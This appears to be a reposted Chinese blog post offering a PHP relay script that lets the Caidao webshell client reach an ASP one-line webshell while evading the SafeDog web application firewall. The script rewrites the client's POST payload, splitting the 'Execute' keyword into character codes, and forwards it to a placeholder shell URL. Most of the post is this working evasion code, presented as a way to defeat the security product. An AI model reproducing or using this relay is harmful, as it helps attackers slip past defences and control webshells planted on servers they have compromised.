菜刀輕松砍殺安全狗 asp一句話中轉腳本


看到很多朋友看了我的PHP中轉腳本http://phpinfo.me/2014/02/01/309.html

,問我那個腳本只能中轉PHP的,但是asp的呢

asp連接的時候安全狗攔截的正是菜刀POST里的eval("Ex"%26cHr(101)%26"cute關鍵字,

那么只需替換下,替換成eval("Ex"%26cHr(101)%26cHr(99)%26"ute即可秒殺之

於是有了如下中轉腳本

<?php
 
/******************************
 
fuck SafeDog
 
如果是asp的一句話那么菜刀連接的時候,地址要這樣填:
 
http://127.0.0.1/bypass.php?type=asp
 
最后三個字母必須是asp不然菜刀會提示腳本類型選擇錯誤...
 
*****************************/
 
$webshell="http://xxoo.com/data/%23data.asp";//把這里改成你的shell地址
$webshell=$webshell."?&1141056911=base64_decode";
$da=$_POST;
$data = $da;
@$data=str_replace("base64_decode",'$_GET[1141056911]',$data); //PHP殺狗
 $data = http_build_query($data);  
 
//asp殺狗
 @$data=str_replace('eval%28%22Ex%22%26cHr%28101%29%26%22cute','eval%28%22Ex%22%26cHr%28101%29%26cHr%2899%29%26%22ute',$data);
echo $data;
$opts = array (  
'http' => array (  
'method' => 'POST',  
'header'=> "Content-type: application/x-www-form-urlencoded\r\n" .  
"Content-Length: " . strlen($data) . "\r\n",  
'content' => $data)
);
 
$context = stream_context_create($opts);  
$html = @file_get_contents($webshell, false, $context); //發送post 
echo $html;  
 
?>

 asp連接的時候要像這樣

有時候安全狗只是個擺設


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM